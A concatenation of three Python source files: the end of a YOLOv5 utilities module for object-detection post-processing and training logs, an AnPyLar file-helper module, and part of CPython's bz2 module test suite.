x = x[(x[:, 5:6] == torch.tensor(classes, device=x.device)).any(1)]
# Apply finite constraint
# if not torch.isfinite(x).all():
# x = x[torch.isfinite(x).all(1)]
# Check shape
n = x.shape[0] # number of boxes
if not n: # no boxes
continue
elif n > max_nms: # excess boxes
x = x[x[:, 4].argsort(descending=True)[:max_nms]] # sort by confidence
# Batched NMS
c = x[:, 5:6] * (0 if agnostic else max_wh) # classes
boxes, scores = x[:, :4] + c, x[:, 4] # boxes (offset by class), scores
i = torchvision.ops.nms(boxes, scores, iou_thres) # NMS
if i.shape[0] > max_det: # limit detections
i = i[:max_det]
if merge and (1 < n < 3E3): # Merge NMS (boxes merged using weighted mean)
# update boxes as boxes(i,4) = weights(i,n) * boxes(n,4)
iou = box_iou(boxes[i], boxes) > iou_thres # iou matrix
weights = iou * scores[None] # box weights
x[i, :4] = torch.mm(weights, x[:, :4]).float() / weights.sum(1, keepdim=True) # merged boxes
if redundant:
i = i[iou.sum(1) > 1] # require redundancy
output[xi] = x[i]
if (time.time() - t) > time_limit:
LOGGER.warning(f'WARNING: NMS time limit {time_limit:.3f}s exceeded')
break # time limit exceeded
return output
def strip_optimizer(f='best.pt', s=''): # from utils.general import *; strip_optimizer()
# Strip optimizer from 'f' to finalize training, optionally save as 's'
x = torch.load(f, map_location=torch.device('cpu'))
if x.get('ema'):
x['model'] = x['ema'] # replace model with ema
for k in 'optimizer', 'best_fitness', 'wandb_id', 'ema', 'updates': # keys
x[k] = None
x['epoch'] = -1
x['model'].half() # to FP16
for p in x['model'].parameters():
p.requires_grad = False
torch.save(x, s or f)
mb = os.path.getsize(s or f) / 1E6 # filesize
LOGGER.info(f"Optimizer stripped from {f},{f' saved as {s},' if s else ''} {mb:.1f}MB")
def print_mutation(results, hyp, save_dir, bucket, prefix=colorstr('evolve: ')):
evolve_csv = save_dir / 'evolve.csv'
evolve_yaml = save_dir / 'hyp_evolve.yaml'
keys = ('metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95', 'val/box_loss',
'val/obj_loss', 'val/cls_loss') + tuple(hyp.keys()) # [results + hyps]
keys = tuple(x.strip() for x in keys)
vals = results + tuple(hyp.values())
n = len(keys)
# Download (optional)
if bucket:
url = f'gs://{bucket}/evolve.csv'
if gsutil_getsize(url) > (evolve_csv.stat().st_size if evolve_csv.exists() else 0):
os.system(f'gsutil cp {url} {save_dir}') # download evolve.csv if larger than local
# Log to evolve.csv
s = '' if evolve_csv.exists() else (('%20s,' * n % keys).rstrip(',') + '\n') # add header
with open(evolve_csv, 'a') as f:
f.write(s + ('%20.5g,' * n % vals).rstrip(',') + '\n')
# Save yaml
with open(evolve_yaml, 'w') as f:
data = pd.read_csv(evolve_csv)
data = data.rename(columns=lambda x: x.strip()) # strip keys
i = np.argmax(fitness(data.values[:, :4])) #
generations = len(data)
f.write('# YOLOv5 Hyperparameter Evolution Results\n' + f'# Best generation: {i}\n' +
f'# Last generation: {generations - 1}\n' + '# ' + ', '.join(f'{x.strip():>20s}' for x in keys[:7]) +
'\n' + '# ' + ', '.join(f'{x:>20.5g}' for x in data.values[i, :7]) + '\n\n')
yaml.safe_dump(data.loc[i][7:].to_dict(), f, sort_keys=False)
# Print to screen
LOGGER.info(prefix + f'{generations} generations finished, current result:\n' + prefix +
', '.join(f'{x.strip():>20s}' for x in keys) + '\n' + prefix + ', '.join(f'{x:20.5g}'
for x in vals) + '\n\n')
if bucket:
os.system(f'gsutil cp {evolve_csv} {evolve_yaml} gs://{bucket}') # upload
def apply_classifier(x, model, img, im0):
# Apply a second stage classifier to YOLO outputs
# Example model = torchvision.models.__dict__['efficientnet_b0'](pretrained=True).to(device).eval()
im0 = [im0] if isinstance(im0, np.ndarray) else im0
for i, d in enumerate(x): # per image
if d is not None and len(d):
d = d.clone()
# Reshape and pad cutouts
b = xyxy2xywh(d[:, :4]) # boxes
b[:, 2:] = b[:, 2:].max(1)[0].unsqueeze(1) # rectangle to square
b[:, 2:] = b[:, 2:] * 1.3 + 30 # pad
d[:, :4] = xywh2xyxy(b).long()
# Rescale boxes from img_size to im0 size
scale_coords(img.shape[2:], d[:, :4], im0[i].shape)
# Classes
pred_cls1 = d[:, 5].long()
ims = []
for a in d:
cutout = im0[i][int(a[1]):int(a[3]), int(a[0]):int(a[2])]
im = cv2.resize(cutout, (224, 224)) # BGR
im = im[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
im = np.ascontiguousarray(im, dtype=np.float32) # uint8 to float32
im /= 255 # 0 - 255 to 0.0 - 1.0
ims.append(im)
pred_cls2 = model(torch.Tensor(ims).to(d.device)).argmax(1) # classifier prediction
x[i] = x[i][pred_cls1 == pred_cls2] # retain matching class detections
return x
def increment_path(path, exist_ok=False, sep='', mkdir=False):
# Increment file or directory path, i.e. runs/exp --> runs/exp{sep}2, runs/exp{sep}3, ... etc.
path = Path(path) # os-agnostic
if path.exists() and not exist_ok:
path, suffix = (path.with_suffix(''), path.suffix) if path.is_file() else (path, '')
# Method 1
for n in range(2, 9999):
p = f'{path}{sep}{n}{suffix}' # increment path
if not os.path.exists(p): #
break
path = Path(p)
# Method 2 (deprecated)
# dirs = glob.glob(f"{path}{sep}*") # similar paths
# matches = [re.search(rf"{path.stem}{sep}(\d+)", d) for d in dirs]
# i = [int(m.groups()[0]) for m in matches if m] # indices
# n = max(i) + 1 if i else 2 # increment number
# path = Path(f"{path}{sep}{n}{suffix}") # increment path
if mkdir:
path.mkdir(parents=True, exist_ok=True) # make directory
return path
# OpenCV Chinese-friendly functions ------------------------------------------------------------------------------------
imshow_ = cv2.imshow # copy to avoid recursion errors
def imread(path, flags=cv2.IMREAD_COLOR):
return cv2.imdecode(np.fromfile(path, np.uint8), flags)
def imwrite(path, im):
try:
cv2.imencode(Path(path).suffix, im)[1].tofile(path)
return True
except Exception:
return False
def imshow(path, im):
imshow_(path.encode('unicode_escape').decode(), im)
cv2.imread, cv2.imwrite, cv2.imshow = imread, imwrite, imshow # redefine
# Variables ------------------------------------------------------------------------------------------------------------
NCOLS = 0 if is_docker() else shutil.get_terminal_size().columns # terminal window size for tqdm
|
utils.py
|
#!/usr/bin/env python
# -*- coding: utf-8; py-indent-offset:4 -*-
###############################################################################
# Copyright 2018 The AnPyLar Team. All Rights Reserved.
# Use of this source code is governed by an MIT-style license that
# can be found in the LICENSE file at http://anpylar.com/mit-license
###############################################################################
import errno
import os
import sys
# prints the error and the parser help and bails out
def print_error(error, parser=None):
print('-' * 50)
print(error)
print('-' * 50)
print()
if parser:
try:
parser.print_help()
except:
pass # avoid new errors
sys.exit(1)
# calculates the name of the item's names by lowercasing and inserting an _
# as a transition between lowercase -> uppercase in the original
# PyroDetail -> pyro_detail
def path_name_calc(name, separator='_'):
tokens = []
lastlower = False
for x in name:
if x.isupper():
if lastlower:
tokens.append(separator)
tokens.append(x.lower())
lastlower = False
else:
tokens.append(x)
lastlower = x.islower()
return ''.join(tokens)
def makedir_error(dirname, parser=None):
if dirname in ['.', '..']:
return
try:
os.makedirs(dirname) # try to make the dir
except OSError as e:
if e.errno != errno.EEXIST: # strange error
print_error(e, parser)
else:
e = 'Directory already exists.'
print_error(e, parser)
def makefile_error(filename, content, parser=None,
encoding='utf-8', newline='\n',
end='\n', itercontent=False, mode='w'):
if 'b' in mode:
encoding = None
try:
if hasattr(filename, 'write'):
f = filename
elif filename == '-':
f = sys.stdout
else:
try:
f = open(filename, mode, newline=newline, encoding=encoding)
except EnvironmentError as e: # some file error
print_error(e, parser)
if not itercontent:
f.write(content)
else:
for x in content:
f.write(x)
if end:
f.write(end)
except EnvironmentError as e: # some file error
print_error(e, parser)
def readfile_error(filename, parser=None, encoding='utf-8',
newline=None, mode='r'):
if 'b' in mode:
encoding = None
try:
with open(filename, mode, newline=newline, encoding=encoding) as f:
return f.read()
except EnvironmentError as e: # some file error
print_error(e, parser)
def read_license(filename, parser=None):
output = ''
if filename:
try:
with open(filename) as f:
for l in f:
if l[0] != '#': # comment it out if needed
output += '# '
output += l
output += '#' * 79 + '\n' # PEP-8 compliant, as separator to code
except EnvironmentError as e:
# parent of IOError/OSError/WindowsError where
print_error(e, parser)
return output
def win_wait_for_parent(raise_exceptions=False):
if not sys.platform == 'win32':
return True
# When started under cygwin, the parent process will die leaving a child
# hanging around. The process has to be waited upon
import ctypes
from ctypes.wintypes import DWORD, BOOL, HANDLE
import threading
kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)
# Get a handle for the right purpose (wait on it aka "synchronization")
SYNCHRONIZE = 0x00100000
phandle = kernel32.OpenProcess(SYNCHRONIZE, 0, os.getppid())
def check_parent():
# Wait for parent signal (death) and exit
kernel32.WaitForSingleObject(phandle, -1) # -1 -> INFINITE
os._exit(0)
if not phandle: # if not possible
if raise_exceptions: # either raise if wished
raise ctypes.WinError(ctypes.get_last_error())
return False # or let the caller know
# kickstart parent check in the background thread
threading.Thread(target=check_parent).start()
return True
|
test_bz2.py
|
from test import support
from test.support import bigmemtest, _4G
import unittest
from io import BytesIO, DEFAULT_BUFFER_SIZE
import os
import pickle
import glob
import tempfile
import pathlib
import random
import shutil
import subprocess
import threading
from test.support import unlink
import _compression
import sys
# Skip tests if the bz2 module doesn't exist.
bz2 = support.import_module('bz2')
from bz2 import BZ2File, BZ2Compressor, BZ2Decompressor
has_cmdline_bunzip2 = None
def ext_decompress(data):
global has_cmdline_bunzip2
if has_cmdline_bunzip2 is None:
has_cmdline_bunzip2 = bool(shutil.which('bunzip2'))
if has_cmdline_bunzip2:
return subprocess.check_output(['bunzip2'], input=data)
else:
return bz2.decompress(data)
class BaseTest(unittest.TestCase):
"Base for other testcases."
TEXT_LINES = [
b'root:x:0:0:root:/root:/bin/bash\n',
b'bin:x:1:1:bin:/bin:\n',
b'daemon:x:2:2:daemon:/sbin:\n',
b'adm:x:3:4:adm:/var/adm:\n',
b'lp:x:4:7:lp:/var/spool/lpd:\n',
b'sync:x:5:0:sync:/sbin:/bin/sync\n',
b'shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\n',
b'halt:x:7:0:halt:/sbin:/sbin/halt\n',
b'mail:x:8:12:mail:/var/spool/mail:\n',
b'news:x:9:13:news:/var/spool/news:\n',
b'uucp:x:10:14:uucp:/var/spool/uucp:\n',
b'operator:x:11:0:operator:/root:\n',
b'games:x:12:100:games:/usr/games:\n',
b'gopher:x:13:30:gopher:/usr/lib/gopher-data:\n',
b'ftp:x:14:50:FTP User:/var/ftp:/bin/bash\n',
b'nobody:x:65534:65534:Nobody:/home:\n',
b'postfix:x:100:101:postfix:/var/spool/postfix:\n',
b'niemeyer:x:500:500::/home/niemeyer:/bin/bash\n',
b'postgres:x:101:102:PostgreSQL Server:/var/lib/pgsql:/bin/bash\n',
b'mysql:x:102:103:MySQL server:/var/lib/mysql:/bin/bash\n',
b'www:x:103:104::/var/www:/bin/false\n',
]
TEXT = b''.join(TEXT_LINES)
DATA = b'BZh91AY&SY.\xc8N\x18\x00\x01>_\x80\x00\x10@\x02\xff\xf0\x01\x07n\x00?\xe7\xff\xe00\x01\x99\xaa\x00\xc0\x03F\x86\x8c#&\x83F\x9a\x03\x06\xa6\xd0\xa6\x93M\x0fQ\xa7\xa8\x06\x804hh\x12$\x11\xa4i4\xf14S\xd2<Q\xb5\x0fH\xd3\xd4\xdd\xd5\x87\xbb\xf8\x94\r\x8f\xafI\x12\xe1\xc9\xf8/E\x00pu\x89\x12]\xc9\xbbDL\nQ\x0e\t1\x12\xdf\xa0\xc0\x97\xac2O9\x89\x13\x94\x0e\x1c7\x0ed\x95I\x0c\xaaJ\xa4\x18L\x10\x05#\x9c\xaf\xba\xbc/\x97\x8a#C\xc8\xe1\x8cW\xf9\xe2\xd0\xd6M\xa7\x8bXa<e\x84t\xcbL\xb3\xa7\xd9\xcd\xd1\xcb\x84.\xaf\xb3\xab\xab\xad`n}\xa0lh\tE,\x8eZ\x15\x17VH>\x88\xe5\xcd9gd6\x0b\n\xe9\x9b\xd5\x8a\x99\xf7\x08.K\x8ev\xfb\xf7xw\xbb\xdf\xa1\x92\xf1\xdd|/";\xa2\xba\x9f\xd5\xb1#A\xb6\xf6\xb3o\xc9\xc5y\\\xebO\xe7\x85\x9a\xbc\xb6f8\x952\xd5\xd7"%\x89>V,\xf7\xa6z\xe2\x9f\xa3\xdf\x11\x11"\xd6E)I\xa9\x13^\xca\xf3r\xd0\x03U\x922\xf26\xec\xb6\xed\x8b\xc3U\x13\x9d\xc5\x170\xa4\xfa^\x92\xacDF\x8a\x97\xd6\x19\xfe\xdd\xb8\xbd\x1a\x9a\x19\xa3\x80ankR\x8b\xe5\xd83]\xa9\xc6\x08\x82f\xf6\xb9"6l$\xb8j@\xc0\x8a\xb0l1..\xbak\x83ls\x15\xbc\xf4\xc1\x13\xbe\xf8E\xb8\x9d\r\xa8\x9dk\x84\xd3n\xfa\xacQ\x07\xb1%y\xaav\xb4\x08\xe0z\x1b\x16\xf5\x04\xe9\xcc\xb9\x08z\x1en7.G\xfc]\xc9\x14\xe1B@\xbb!8`'
EMPTY_DATA = b'BZh9\x17rE8P\x90\x00\x00\x00\x00'
BAD_DATA = b'this is not a valid bzip2 file'
# Some tests need more than one block of uncompressed data. Since one block
# is at least 100,000 bytes, we gather some data dynamically and compress it.
# Note that this assumes that compression works correctly, so we cannot
# simply use the bigger test data for all tests.
test_size = 0
BIG_TEXT = bytearray(128*1024)
for fname in glob.glob(os.path.join(glob.escape(os.path.dirname(__file__)), '*.py')):
with open(fname, 'rb') as fh:
test_size += fh.readinto(memoryview(BIG_TEXT)[test_size:])
if test_size > 128*1024:
break
BIG_DATA = bz2.compress(BIG_TEXT, compresslevel=1)
def setUp(self):
fd, self.filename = tempfile.mkstemp()
os.close(fd)
def tearDown(self):
support.gc_collect()
unlink(self.filename)
class BZ2FileTest(BaseTest):
"Test the BZ2File class."
def createTempFile(self, streams=1, suffix=b""):
with open(self.filename, "wb") as f:
f.write(self.DATA * streams)
f.write(suffix)
def testBadArgs(self):
self.assertRaises(TypeError, BZ2File, 123.456)
self.assertRaises(ValueError, BZ2File, os.devnull, "z")
self.assertRaises(ValueError, BZ2File, os.devnull, "rx")
self.assertRaises(ValueError, BZ2File, os.devnull, "rbt")
self.assertRaises(ValueError, BZ2File, os.devnull, compresslevel=0)
self.assertRaises(ValueError, BZ2File, os.devnull, compresslevel=10)
def testRead(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT)
def testReadBadFile(self):
self.createTempFile(streams=0, suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertRaises(OSError, bz2f.read)
def testReadMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT * 5)
def testReadMonkeyMultiStream(self):
# Test BZ2File.read() on a multi-stream archive where a stream
# boundary coincides with the end of the raw read buffer.
buffer_size = _compression.BUFFER_SIZE
_compression.BUFFER_SIZE = len(self.DATA)
try:
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT * 5)
finally:
_compression.BUFFER_SIZE = buffer_size
def testReadTrailingJunk(self):
self.createTempFile(suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), self.TEXT)
def testReadMultiStreamTrailingJunk(self):
self.createTempFile(streams=5, suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), self.TEXT * 5)
def testRead0(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(0), b"")
def testReadChunk10(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
text = b''
while True:
str = bz2f.read(10)
if not str:
break
text += str
self.assertEqual(text, self.TEXT)
def testReadChunk10MultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
text = b''
while True:
str = bz2f.read(10)
if not str:
break
text += str
self.assertEqual(text, self.TEXT * 5)
def testRead100(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(100), self.TEXT[:100])
def testPeek(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
pdata = bz2f.peek()
self.assertNotEqual(len(pdata), 0)
self.assertTrue(self.TEXT.startswith(pdata))
self.assertEqual(bz2f.read(), self.TEXT)
def testReadInto(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
n = 128
b = bytearray(n)
self.assertEqual(bz2f.readinto(b), n)
self.assertEqual(b, self.TEXT[:n])
n = len(self.TEXT) - n
b = bytearray(len(self.TEXT))
self.assertEqual(bz2f.readinto(b), n)
self.assertEqual(b[:n], self.TEXT[-n:])
def testReadLine(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readline, None)
for line in self.TEXT_LINES:
self.assertEqual(bz2f.readline(), line)
def testReadLineMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readline, None)
for line in self.TEXT_LINES * 5:
self.assertEqual(bz2f.readline(), line)
def testReadLines(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readlines, None)
self.assertEqual(bz2f.readlines(), self.TEXT_LINES)
def testReadLinesMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readlines, None)
self.assertEqual(bz2f.readlines(), self.TEXT_LINES * 5)
def testIterator(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertEqual(list(iter(bz2f)), self.TEXT_LINES)
def testIteratorMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertEqual(list(iter(bz2f)), self.TEXT_LINES * 5)
def testClosedIteratorDeadlock(self):
# Issue #3309: Iteration on a closed BZ2File should release the lock.
self.createTempFile()
bz2f = BZ2File(self.filename)
bz2f.close()
self.assertRaises(ValueError, next, bz2f)
# This call will deadlock if the above call failed to release the lock.
self.assertRaises(ValueError, bz2f.readlines)
def testWrite(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteChunks10(self):
with BZ2File(self.filename, "w") as bz2f:
n = 0
while True:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
bz2f.write(str)
n += 1
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteNonDefaultCompressLevel(self):
expected = bz2.compress(self.TEXT, compresslevel=5)
with BZ2File(self.filename, "w", compresslevel=5) as bz2f:
bz2f.write(self.TEXT)
with open(self.filename, "rb") as f:
self.assertEqual(f.read(), expected)
def testWriteLines(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.writelines)
bz2f.writelines(self.TEXT_LINES)
# Issue #1535500: Calling writelines() on a closed BZ2File
# should raise an exception.
self.assertRaises(ValueError, bz2f.writelines, ["a"])
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteMethodsOnReadOnlyFile(self):
with BZ2File(self.filename, "w") as bz2f:
bz2f.write(b"abc")
with BZ2File(self.filename, "r") as bz2f:
self.assertRaises(OSError, bz2f.write, b"a")
self.assertRaises(OSError, bz2f.writelines, [b"a"])
def testAppend(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with BZ2File(self.filename, "a") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT * 2)
def testSeekForward(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekForwardAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(len(self.TEXT) + 150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekBackwards(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.read(500)
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[500-150:])
def testSeekBackwardsAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
readto = len(self.TEXT) + 100
while readto > 0:
readto -= len(bz2f.read(readto))
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[100-150:] + self.TEXT)
def testSeekBackwardsFromEnd(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150, 2)
self.assertEqual(bz2f.read(), self.TEXT[len(self.TEXT)-150:])
def testSeekBackwardsFromEndAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
bz2f.seek(-1000, 2)
self.assertEqual(bz2f.read(), (self.TEXT * 2)[-1000:])
def testSeekPostEnd(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT) * 5)
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndTwice(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndTwiceMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT) * 5)
self.assertEqual(bz2f.read(), b"")
def testSeekPreStart(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150)
self.assertEqual(bz2f.tell(), 0)
self.assertEqual(bz2f.read(), self.TEXT)
def testSeekPreStartMultiStream(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150)
self.assertEqual(bz2f.tell(), 0)
self.assertEqual(bz2f.read(), self.TEXT * 2)
def testFileno(self):
self.createTempFile()
with open(self.filename, 'rb') as rawf:
bz2f = BZ2File(rawf)
try:
self.assertEqual(bz2f.fileno(), rawf.fileno())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.fileno)
def testSeekable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertTrue(bz2f.seekable())
bz2f.read()
self.assertTrue(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertFalse(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
src = BytesIO(self.DATA)
src.seekable = lambda: False
bz2f = BZ2File(src)
try:
self.assertFalse(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
def testReadable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertTrue(bz2f.readable())
bz2f.read()
self.assertTrue(bz2f.readable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.readable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertFalse(bz2f.readable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.readable)
def testWritable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertFalse(bz2f.writable())
bz2f.read()
self.assertFalse(bz2f.writable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.writable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertTrue(bz2f.writable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.writable)
def testOpenDel(self):
self.createTempFile()
for i in range(10000):
o = BZ2File(self.filename)
del o
if i % 100 == 0:
support.gc_collect()
def testOpenNonexistent(self):
self.assertRaises(OSError, BZ2File, "/non/existent")
def testReadlinesNoNewline(self):
# Issue #1191043: readlines() fails on a file containing no newline.
data = b'BZh91AY&SY\xd9b\x89]\x00\x00\x00\x03\x80\x04\x00\x02\x00\x0c\x00 \x00!\x9ah3M\x13<]\xc9\x14\xe1BCe\x8a%t'
with open(self.filename, "wb") as f:
f.write(data)
with BZ2File(self.filename) as bz2f:
lines = bz2f.readlines()
self.assertEqual(lines, [b'Test'])
with BZ2File(self.filename) as bz2f:
xlines = list(bz2f.readlines())
self.assertEqual(xlines, [b'Test'])
def testContextProtocol(self):
f = None
with BZ2File(self.filename, "wb") as f:
f.write(b"xxx")
f = BZ2File(self.filename, "rb")
f.close()
try:
with f:
pass
except ValueError:
pass
else:
self.fail("__enter__ on a closed file didn't raise an exception")
try:
with BZ2File(self.filename, "wb") as f:
1/0
except ZeroDivisionError:
pass
else:
self.fail("1/0 didn't raise an exception")
def testThreading(self):
# Issue #7205: Using a BZ2File from several threads shouldn't deadlock.
data = b"1" * 2**20
nthreads = 10
with BZ2File(self.filename, 'wb') as f:
def comp():
for i in range(5):
f.write(data)
threads = [threading.Thread(target=comp) for i in range(nthreads)]
with support.start_threads(threads):
pass
def testMixedIterationAndReads(self):
self.createTempFile()
linelen = len(self.TEXT_LINES[0])
halflen = linelen // 2
with BZ2File(self.filename) as bz2f:
bz2f.read(halflen)
self.assertEqual(next(bz2f), self.TEXT_LINES[0][halflen:])
self.assertEqual(bz2f.read(), self.TEXT[linelen:])
with BZ2File(self.filename) as bz2f:
bz2f.readline()
self.assertEqual(next(bz2f), self.TEXT_LINES[1])
self.assertEqual(bz2f.readline(), self.TEXT_LINES[2])
with BZ2File(self.filename) as bz2f:
bz2f.readlines()
self.assertRaises(StopIteration, next, bz2f)
self.assertEqual(bz2f.readlines(), [])
def testMultiStreamOrdering(self):
# Test the ordering of streams when reading a multi-stream archive.
data1 = b"foo" * 1000
data2 = b"bar" * 1000
with BZ2File(self.filename, "w") as bz2f:
bz2f.write(data1)
with BZ2File(self.filename, "a") as bz2f:
bz2f.write(data2)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), data1 + data2)
def testOpenBytesFilename(self):
str_filename = self.filename
try:
bytes_filename = str_filename.encode("ascii")
except UnicodeEncodeError:
self.skipTest("Temporary file name needs to be ASCII")
with BZ2File(bytes_filename, "wb") as f:
f.write(self.DATA)
with BZ2File(bytes_filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
# Sanity check that we are actually operating on the right file.
with BZ2File(str_filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
def testOpenPathLikeFilename(self):
filename = pathlib.Path(self.filename)
with BZ2File(filename, "wb") as f:
f.write(self.DATA)
with BZ2File(filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
def testDecompressLimited(self):
"""Decompressed data buffering should be limited"""
bomb = bz2.compress(b'\0' * int(2e6), compresslevel=9)
self.assertLess(len(bomb), _compression.BUFFER_SIZE)
decomp = BZ2File(BytesIO(bomb))
self.assertEqual(decomp.read(1), b'\0')
max_decomp = 1 + DEFAULT_BUFFER_SIZE
self.assertLessEqual(decomp._buffer.raw.tell(), max_decomp,
"Excessive amount of data was decompressed")
# Tests for a BZ2File wrapping another file object:
def testReadBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT)
self.assertFalse(bio.closed)
def testPeekBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
pdata = bz2f.peek()
self.assertNotEqual(len(pdata), 0)
self.assertTrue(self.TEXT.startswith(pdata))
self.assertEqual(bz2f.read(), self.TEXT)
def testWriteBytesIO(self):
with BytesIO() as bio:
with BZ2File(bio, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
self.assertEqual(ext_decompress(bio.getvalue()), self.TEXT)
self.assertFalse(bio.closed)
def testSeekForwardBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekBackwardsBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
bz2f.read(500)
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[500-150:])
def test_read_truncated(self):
# Drop the eos_magic field (6 bytes) and CRC (4 bytes).
truncated = self.DATA[:-10]
with BZ2File(BytesIO(truncated)) as f:
self.assertRaises(EOFError, f.read)
with BZ2File(BytesIO(truncated)) as f:
self.assertEqual(f.read(len(self.TEXT)), self.TEXT)
self.assertRaises(EOFError, f.read, 1)
# Incomplete 4-byte file header, and block header of at least 146 bits.
for i in range(22):
with BZ2File(BytesIO(truncated[:i])) as f:
self.assertRaises(EOFError, f.read, 1)
class BZ2CompressorTest(BaseTest):
def testCompress(self):
bz2c = BZ2Compressor()
self.assertRaises(TypeError, bz2c.compress)
data = bz2c.compress(self.TEXT)
data += bz2c.flush()
self.assertEqual(ext_decompress(data), self.TEXT)
def testCompressEmptyString(self):
bz2c = BZ2Compressor()
data = bz2c.compress(b'')
data += bz2c.flush()
self.assertEqual(data, self.EMPTY_DATA)
